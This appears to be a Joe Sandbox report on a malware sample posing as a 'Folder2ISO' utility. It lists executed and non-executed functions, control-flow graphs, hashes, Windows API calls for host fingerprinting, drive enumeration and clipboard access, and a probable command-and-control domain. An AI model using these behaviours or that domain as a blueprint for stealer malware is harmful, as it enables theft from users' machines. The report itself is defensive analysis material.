                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: LibraryLoadProcessVersion
                  • String ID: !$#$#$%$'$)$+$-$/$1$3$5$7$9$:$;$=$?$A$B$C$E$G$W$b$contintnetksows.shop$e$f$l$m$o$p$r$r$v$w$w${$|$}
                  • API String ID: 1829952579-3073657497
                  • Opcode ID: 61e68df6e8efa75c0d7985c8ed1acabef61a53ddb5229d0e283a2503c64af074
                  • Instruction ID: 6543338087bf834b742fb159da4d4e9de70c53ea59e9949948779f2d8bf94ba6
                  • Opcode Fuzzy Hash: 61e68df6e8efa75c0d7985c8ed1acabef61a53ddb5229d0e283a2503c64af074
                  • Instruction Fuzzy Hash: FC926970508B80CFD725DF3CD584716BFE1AF1A214F088A9DD8DA8B396D375A449CBA2
                  Function 031FE9A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 194COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Object$DeleteSelect$CallbackDispatcherUser
                  • String ID:
                  • API String ID: 4290106128-3916222277
                  • Opcode ID: 61daa01bc131d878cd6518c074befb0d2068951986c64e8a52d74a751907393c
                  • Instruction ID: e029d2201f903a0656d6e7960d061503cf0d942241c3d4d0ef2a7305c7f31625
                  • Opcode Fuzzy Hash: 61daa01bc131d878cd6518c074befb0d2068951986c64e8a52d74a751907393c
                  • Instruction Fuzzy Hash: DBC15DB04293859FD370EF25D68878EBBE0ABD6308F60891DE49C5B350D7749498CF86
                  Function 031F68A1 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 410COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 360 31f68a1-31f690c call 320a3d0 364 31f695f-31f6968 360->364 365 31f690e-31f690f 360->365 367 31f697b-31f6987 364->367 368 31f696a 364->368 366 31f6910-31f695d 365->366 366->364 366->366 370 31f699b-31f6a2e FreeLibrary call 320a3d0 GetComputerNameExA 367->370 371 31f6989-31f698f 367->371 369 31f6970-31f6979 368->369 369->367 369->369 376 31f6a81-31f6a8a 370->376 377 31f6a30-31f6a7f 370->377 372 31f6990-31f6999 371->372 372->370 372->372 378 31f6aad 376->378 379 31f6a8c-31f6a98 376->379 377->376 377->377 381 31f6ab3-31f6abf 378->381 380 31f6aa0-31f6aa9 379->380 380->380 382 31f6aab 380->382 383 31f6adb-31f6b49 GetComputerNameExA 381->383 384 31f6ac1-31f6ac7 381->384 382->381 386 31f6b4b 383->386 387 31f6ba4-31f6bad 383->387 385 31f6ad0-31f6ad9 384->385 385->383 385->385 388 31f6b50-31f6ba2 386->388 389 31f6baf-31f6bb5 387->389 390 31f6bcb-31f6bd7 387->390 388->387 388->388 391 31f6bc0-31f6bc9 389->391 392 31f6beb-31f6c66 390->392 393 31f6bd9-31f6bdf 390->393 391->390 391->391 396 31f6ccd-31f6cd6 392->396 397 31f6c68 392->397 394 31f6be0-31f6be9 393->394 394->392 394->394 399 31f6ceb-31f6cf7 396->399 400 31f6cd8-31f6cdf 396->400 398 31f6c70-31f6ccb 397->398 398->396 398->398 402 31f6d0b-31f6d7f call 320a3d0 399->402 403 31f6cf9-31f6cff 399->403 401 31f6ce0-31f6ce9 400->401 401->399 401->401 408 31f6dd4-31f6ddd 402->408 409 31f6d81 402->409 404 31f6d00-31f6d09 403->404 404->402 404->404 411 31f6ddf-31f6de5 408->411 412 31f6dfb-31f6e08 408->412 410 31f6d90-31f6dd2 409->410 410->408 410->410 413 31f6df0-31f6df9 411->413 414 31f6e29-31f6e35 412->414 413->412 413->413 415 31f6ecb-31f6ece 414->415 416 31f6e3b-31f6e42 414->416 419 31f6ed4-31f6f26 415->419 417 31f6e44-31f6e5c 416->417 418 31f6e10-31f6e15 416->418 423 31f6e5e-31f6e61 417->423 424 31f6e90-31f6e98 417->424 422 31f6e1a-31f6e23 418->422 420 31f6f7a-31f6f83 419->420 421 31f6f28 419->421 426 31f6f9b-31f6f9e call 31fbfc0 420->426 427 31f6f85-31f6f8b 420->427 425 31f6f30-31f6f78 421->425 422->414 428 31f6ed0-31f6ed2 422->428 423->424 429 31f6e63-31f6e80 423->429 424->422 430 31f6e9a-31f6ec6 424->430 425->420 425->425 433 31f6fa3-31f6fc3 426->433 431 31f6f90-31f6f99 427->431 428->419 429->422 430->422 431->426 431->431
                  APIs
                  • FreeLibrary.KERNEL32(?), ref: 031F69A4
                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 031F69E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ComputerFreeLibraryName
                  • String ID: CFZA$odB;
                  • API String ID: 2904949787-3336259320
                  • Opcode ID: 4df36ee93a2f48c02d1c185a0eae7b4cf4cd552379a39118f38553ce51bea286
                  • Instruction ID: 9791d5caabb915b8c050997d18b7f697ed301f855367f54ecdd09b2ef3f5dda0
                  • Opcode Fuzzy Hash: 4df36ee93a2f48c02d1c185a0eae7b4cf4cd552379a39118f38553ce51bea286
                  • Instruction Fuzzy Hash: 85F13770504B818FD725CB39C4647E6BBE1AF1A305F48885ED4EB9B282DBB9B509CB50
                  Function 031F689B Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 444COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 544 31f689b-31f69b5 call 320a3d0 547 31f69ba-31f6a2e GetComputerNameExA 544->547 548 31f6a81-31f6a8a 547->548 549 31f6a30-31f6a7f 547->549 550 31f6aad 548->550 551 31f6a8c-31f6a98 548->551 549->548 549->549 553 31f6ab3-31f6abf 550->553 552 31f6aa0-31f6aa9 551->552 552->552 554 31f6aab 552->554 555 31f6adb-31f6b49 GetComputerNameExA 553->555 556 31f6ac1-31f6ac7 553->556 554->553 558 31f6b4b 555->558 559 31f6ba4-31f6bad 555->559 557 31f6ad0-31f6ad9 556->557 557->555 557->557 560 31f6b50-31f6ba2 558->560 561 31f6baf-31f6bb5 559->561 562 31f6bcb-31f6bd7 559->562 560->559 560->560 563 31f6bc0-31f6bc9 561->563 564 31f6beb-31f6c66 562->564 565 31f6bd9-31f6bdf 562->565 563->562 563->563 568 31f6ccd-31f6cd6 564->568 569 31f6c68 564->569 566 31f6be0-31f6be9 565->566 566->564 566->566 571 31f6ceb-31f6cf7 568->571 572 31f6cd8-31f6cdf 568->572 570 31f6c70-31f6ccb 569->570 570->568 570->570 574 31f6d0b-31f6d7f call 320a3d0 571->574 575 31f6cf9-31f6cff 571->575 573 31f6ce0-31f6ce9 572->573 573->571 573->573 580 31f6dd4-31f6ddd 574->580 581 31f6d81 574->581 576 31f6d00-31f6d09 575->576 576->574 576->576 583 31f6ddf-31f6de5 580->583 584 31f6dfb-31f6e08 580->584 582 31f6d90-31f6dd2 581->582 582->580 582->582 585 31f6df0-31f6df9 583->585 586 31f6e29-31f6e35 584->586 585->584 585->585 587 31f6ecb-31f6ece 586->587 588 31f6e3b-31f6e42 586->588 591 31f6ed4-31f6f26 587->591 589 31f6e44-31f6e5c 588->589 590 31f6e10-31f6e15 588->590 595 31f6e5e-31f6e61 589->595 596 31f6e90-31f6e98 589->596 594 31f6e1a-31f6e23 590->594 592 31f6f7a-31f6f83 591->592 593 31f6f28 591->593 598 31f6f9b-31f6f9e call 31fbfc0 592->598 599 31f6f85-31f6f8b 592->599 597 31f6f30-31f6f78 593->597 594->586 600 31f6ed0-31f6ed2 594->600 595->596 601 31f6e63-31f6e80 595->601 596->594 602 31f6e9a-31f6ec6 596->602 597->592 597->597 605 31f6fa3-31f6fc3 598->605 603 31f6f90-31f6f99 599->603 600->591 601->594 602->594 603->598 603->603
                  APIs
                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 031F69E0
                  • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 031F6AF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ComputerName
                  • String ID: CFZA$N\ln
                  • API String ID: 3545744682-3828061916
                  • Opcode ID: b7f60d28b221e8f61e17ed02a85bd3ee47a794a402f26050df0bc0cc47271fae
                  • Instruction ID: ea7cfaa9a87f4260c04dd77174a87f8b6784e2bbe484f6847080e3cf07c190e2
                  • Opcode Fuzzy Hash: b7f60d28b221e8f61e17ed02a85bd3ee47a794a402f26050df0bc0cc47271fae
                  • Instruction Fuzzy Hash: 59F15770104B818FD725CF29C4A07E7BBE1AF1A304F48895ED9EB9B282D7B9B505CB50
                  Function 00622BB3 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1312 622bb3-622bbe call 622ade 1314 622bc3-622bc5 1312->1314 1315 622bf0-622bf3 1314->1315 1316 622bc7-622bea GetCommandLineW CommandLineToArgvW DialogBoxParamW 1314->1316 1316->1315
                  APIs
                    • Part of subcall function 00622ADE: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00622B01
                    • Part of subcall function 00622ADE: lstrcpyW.KERNEL32(C:\Users\user\Desktop\6RVmzn1DzL.ini,?), ref: 00622B60
                    • Part of subcall function 00622ADE: CreateMutexW.KERNEL32(00000000,00000001,Folder2ISO,?,AllowMultipleInstances,00000001), ref: 00622B7F
                    • Part of subcall function 00622ADE: GetLastError.KERNEL32(?,AllowMultipleInstances,00000001), ref: 00622B85
                    • Part of subcall function 00622ADE: EnumWindows.USER32(00622A7A,00000000), ref: 00622B98
                  • GetCommandLineW.KERNEL32(00651428,?,0062F581,00620000,00000000,00000000), ref: 00622BCC
                  • CommandLineToArgvW.SHELL32(00000000,?,0062F581,00620000,00000000,00000000), ref: 00622BD3
                  • DialogBoxParamW.USER32(?,00000001,00000000,006227E6,00000000), ref: 00622BEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CommandLine$ArgvCreateDialogEnumErrorFileLastModuleMutexNameParamWindowslstrcpy
                  • String ID:
                  • API String ID: 402598162-0
                  • Opcode ID: ed8c83aadde196833a259f8e50eadd48b3fa1845a0d70164ce6bfdda0322d51f
                  • Instruction ID: 33232975aadd0a720dcfbb3c969c6c9867ed346d2b6e391928e6f5ae7dfa9b17
                  • Opcode Fuzzy Hash: ed8c83aadde196833a259f8e50eadd48b3fa1845a0d70164ce6bfdda0322d51f
                  • Instruction Fuzzy Hash: 9AE086355543227BC7109F707C19B8637D7AB0AB01F516805B900EB190C6B05481CF54
                  Function 02DE1934 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02DE19C6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: .dll
                  • API String ID: 1029625771-2738580789
                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                  • Instruction ID: 26f809818e7e65915e69314b500aef425b5deb3a73639e101d473ceba0c8d2aa
                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                  • Instruction Fuzzy Hash: E421D2717042858FEF21EF68CC44BAA7BE8AF11264F18416CD8AB9BB41D730EC45CB90
                  Function 031D9240 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 031D926D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                  • API String ID: 621844428-780655312
                  • Opcode ID: ea51bdb09ece6449c8f816060a1d2cbaeb4d98d54e4bdc0861725eb6080ad395
                  • Instruction ID: 66810fc101ba50b52c0279a0e23aa809efe2f313f6e47f9db117563b8a48304a
                  • Opcode Fuzzy Hash: ea51bdb09ece6449c8f816060a1d2cbaeb4d98d54e4bdc0861725eb6080ad395
                  • Instruction Fuzzy Hash: 90F0C93841C311DBCBD8FBA492443AC77A86F8F244F02861AE9C659949EB7991CDC653
                  Function 031F8967 Relevance: 1.9, APIs: 1, Instructions: 414COMMON
                  Download Yara Rule
                  APIs
                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 031F8A7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InstalledMemoryPhysicallySystem
                  • String ID:
                  • API String ID: 3960555810-0
                  • Opcode ID: 6c7655039255b3cfd7cceb35ffcfa43e43fdb5fc6ebf689ae6119bda5d89f803
                  • Instruction ID: 644269d0a9b88794b249ffc8663e331c888e9ac0e884a8f6484c1cab75ef337d
                  • Opcode Fuzzy Hash: 6c7655039255b3cfd7cceb35ffcfa43e43fdb5fc6ebf689ae6119bda5d89f803
                  • Instruction Fuzzy Hash: 72E19E71504B918FD72ACF39C4507A6FBF1AF4A304F0889AEC5EB9B292D739A445CB10
                  Function 02DE0586 Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02DE0600
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                  • Instruction ID: 67a2726e57d7114ed82110556cfb48a53394ca2644e47d54b60089f63ba554ce
                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                  • Instruction Fuzzy Hash: 6EB1D372500A06ABDF21BE60CC80BA7B7E9FF45316F14062DE59AA6350E771ED50CFA1
                  Function 03207B2C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 03207BB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 7ace639a88bf674bb6e4ada1ad277c8d760e052965164d4f77321992557b625f
                  • Instruction ID: d79f46a888964070329c5a42a487e814755117f3856fbf0602401e13cbd9b035
                  • Opcode Fuzzy Hash: 7ace639a88bf674bb6e4ada1ad277c8d760e052965164d4f77321992557b625f
                  • Instruction Fuzzy Hash: E3211D756406429BD718CF18D4A4716B7E2FF95300B68CA5DC5969B789DB30E881CFC4
                  Function 03203D8F Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03203DC9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InformationVolume
                  • String ID:
                  • API String ID: 2039140958-0
                  • Opcode ID: 2dcfee4900f914ee841a463c55c9bee1dd4da6fcee2f8816f8081140376e9ab3
                  • Instruction ID: 40574d4b4cdd5491e4edc0d58e2eaaa30a907d199d68f61dbf068d56e19dbf6c
                  • Opcode Fuzzy Hash: 2dcfee4900f914ee841a463c55c9bee1dd4da6fcee2f8816f8081140376e9ab3
                  • Instruction Fuzzy Hash: 7BF0E5352D0741AFE324EF20EC12F567B65AB09B00F24891CFAC39A2C2DBB4B414CB18
                  Function 03207BE5 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                  Download Yara Rule
                  APIs
                  • GetLogicalDrives.KERNELBASE ref: 03207BE5
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: DrivesLogical
                  • String ID:
                  • API String ID: 999431828-0
                  • Opcode ID: 79d7dce86a44f7bc2f53b79a294f006178b57c1da342bf089d166929e4970dc7
                  • Instruction ID: f396eb6db028b21d54fa05eecc310bd047d601575cabfb8d3800c2545a368bb9
                  • Opcode Fuzzy Hash: 79d7dce86a44f7bc2f53b79a294f006178b57c1da342bf089d166929e4970dc7
                  • Instruction Fuzzy Hash: 49F01C757106008FC369DF28E965926B7E1FB48208314856DE557C7B96DB30A896CF44
                  Function 031FB05F Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID:
                  • API String ID: 2525500382-0
                  • Opcode ID: a1078fe58ef7700761990d27bde6fd105c563950227992fce7209a5cd2adf37d
                  • Instruction ID: 28d07f51f146e0a5036f021648fc8718102b04a812b3a5b2b53370659a0f0980
                  • Opcode Fuzzy Hash: a1078fe58ef7700761990d27bde6fd105c563950227992fce7209a5cd2adf37d
                  • Instruction Fuzzy Hash: 3EF0F2B8200A02CFC328DF28D094A56B7F2FB8C304F60852CD5AB87B14DB307A05CB04
                  Function 03206022 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlFreeHeap.NTDLL(?,00000000), ref: 03206028
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 26756327a4b43a3ea9cd17f87b3b6dd3151fb35b628a384c4983a08e165c8b93
                  • Instruction ID: 46b0a161b2dac3cc1386489962bbd35203ea232ac374179e30db15051e491f2e
                  • Opcode Fuzzy Hash: 26756327a4b43a3ea9cd17f87b3b6dd3151fb35b628a384c4983a08e165c8b93
                  • Instruction Fuzzy Hash: ACC09B36640105FEDE101A44FC05BD8B725E750229F604062E71C95051C233556BD794

                  Non-executed Functions

                  Function 031FE780 Relevance: 31.7, APIs: 6, Strings: 12, Instructions: 180clipboardCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Clipboard$CloseDataLongOpenWindow
                  • String ID: #$&$)$+$,$.$7$8$9$:$;$g
                  • API String ID: 1647500905-2585135712
                  • Opcode ID: ed7b47b73eaeedec3676eb255fb8da4f28fec7f973e93bb2569002b9906e2d9f
                  • Instruction ID: 1836d3c423eba5213492de7122bfecb3ae720a9054cc91a85e6aeadcec0f404c
                  • Opcode Fuzzy Hash: ed7b47b73eaeedec3676eb255fb8da4f28fec7f973e93bb2569002b9906e2d9f
                  • Instruction Fuzzy Hash: 8E715BB4508740CFD764DF28D184716BBF0AF0A314F058A9DE8CA8B766D335E949CBA2
                  Function 0063B365 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 167libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___crtIsPackagedApp.LIBCMT ref: 0063B394
                  • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000800,?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B3B4
                  • GetLastError.KERNEL32(?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B3C0
                  • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B3D6
                  • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0063B3EC
                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0063B408
                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0063B41C
                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0063B430
                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0063B448
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B45A
                  • OutputDebugStringW.KERNEL32(?,?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B469
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPackagedPresentString___crt
                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                  • API String ID: 2635489986-564504941
                  • Opcode ID: 3b72f988ad7044d9bf5a57a98bbb714cac33ec4dacaf187c2a27776d37246fe5
                  • Instruction ID: e6e4802dff087c4060bbc59629a32a07d0e9d8dd7eef008d38c6a33d369e5ebb
                  • Opcode Fuzzy Hash: 3b72f988ad7044d9bf5a57a98bbb714cac33ec4dacaf187c2a27776d37246fe5
                  • Instruction Fuzzy Hash: 8951B135900312ABC720DFB5DC58A6BBBEBBF89B51F142919F605D7265EB30C900CBA5
                  Function 00639F7E Relevance: 27.5, APIs: 18, Instructions: 544COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60add5b6244e98cb20a73502fd4ac33a182b568a2d130c28b969b496c671803c
                  • Instruction ID: 23c406b8e6a387a64e2ad2968857f8e7a4798ee04453dc6266913b8756197c99
                  • Opcode Fuzzy Hash: 60add5b6244e98cb20a73502fd4ac33a182b568a2d130c28b969b496c671803c
                  • Instruction Fuzzy Hash: 8C2288716083419FD724CFA8C885AABB7E6BF89314F584A2DF5CA83291D730D941DB93
                  Function 031D97F0 Relevance: 16.6, Strings: 13, Instructions: 310COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: %7=$#)).$)#<|$*:9;$1)7.$3 / $B*<0$BJ\H$J`|s$K$&?$QQ[Q$T^XP$dQ
                  • API String ID: 0-3315144211
                  • Opcode ID: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction ID: f11d70ea2f54969e2b088f19906d13b138d3da7fd0097f9e1f2ff0fe54e8fb26
                  • Opcode Fuzzy Hash: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction Fuzzy Hash: D7B166B16083918FD315CF29C4A0B5BFFE0AF96644F18895DE4D98B362C335D94ACB92
                  Function 02D9B163 Relevance: 16.6, Strings: 13, Instructions: 310COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %7=$#)).$)#<|$*:9;$1)7.$3 / $B*<0$BJ\H$J`|s$K$&?$QQ[Q$T^XP$dQ
                  • API String ID: 0-3315144211
                  • Opcode ID: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction ID: 501ab873c161ff375f8925307fa04a7248c182d1449c297535bf265160e41852
                  • Opcode Fuzzy Hash: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction Fuzzy Hash: 32B165B150C3818FD725CF29D49076AFBE0AF96648F18895DF4D98B362C335C84ADB92
                  Function 006229E6 Relevance: 16.6, APIs: 11, Instructions: 54stringwindowmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(?,00000005,?,?,?,?,?,?,00622ACA), ref: 006229F8
                  • IsIconic.USER32(?), ref: 006229FB
                  • ShowWindow.USER32(?,00000009,?,?,?,?,?,?,00622ACA), ref: 00622A08
                  • SetForegroundWindow.USER32(?), ref: 00622A0B
                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,00622ACA), ref: 00622A11
                  • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,00622ACA), ref: 00622A1A
                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,00622ACA), ref: 00622A2A
                  • GetCurrentDirectoryW.KERNEL32(00000104,00000000,?,?,?,?,?,?,?,00622ACA), ref: 00622A3C
                  • lstrcpyW.KERNEL32(00000001,00000000), ref: 00622A48
                  • SendMessageW.USER32(?,0000004A,00000000,00000000), ref: 00622A65
                  • LocalFree.KERNEL32(00000000), ref: 00622A6C
                  Memory Dump Source
